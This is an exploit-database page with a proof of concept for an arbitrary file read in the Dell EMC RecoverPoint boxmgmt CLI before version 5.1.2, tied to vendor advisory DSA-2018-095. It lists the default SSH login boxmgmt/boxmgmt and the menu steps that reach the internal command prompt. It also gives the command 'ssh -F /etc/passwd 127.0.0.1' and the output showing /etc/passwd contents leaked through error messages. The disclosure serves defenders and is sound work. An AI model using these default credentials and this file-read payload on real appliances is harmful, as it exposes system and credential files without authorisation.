Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 Arbitrary File Read

2018.05.23
Credit: Paul Taylor
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

# Exploit Title: Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read # Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3 # Date: 2018-05-21 # Vendor Advisory: DSA-2018-095 # Vendor KB: https://support.emc.com/kb/521234 # Exploit Author: Paul Taylor # Github: https://github.com/bao7uo/dell-emc_recoverpoint # Website: https://www.foregenix.com/blog/foregenix-identify-dell-emc-recoverpoint-zero-day-vulnerabilities # Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2 # CVE: N/A # 1. Description # When logging in as boxmgmt and running an internal command, the ssh command may be used # to display the contents of files from the file system which are accessible to the boxmgmt user. # 2. Proof of Concept # Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt) # Select [3] Diagnostics # Select [5] Run Internal Command # ssh -F /etc/passwd 127.0.0.1 test-cluster: 5 This is the list of commands you are allowed to use: ALAT NetDiag arp arping date ethtool kps.pl netstat ping ping6 ssh telnet top uptime Enter internal command: ssh -F /etc/passwd 127.0.0.1 /etc/passwd: line 1: Bad configuration option: root:x:0:0:root:/root:/bin/tcsh /etc/passwd: line 2: Bad configuration option: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin /etc/passwd: line 3: Bad configuration option: bin:x:2:2:bin:/bin:/usr/sbin/nologin <SNIP> /etc/passwd: terminating, 34 bad configuration options Command "ssh -F /etc/passwd 127.0.0.1" exited with return code 65280


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top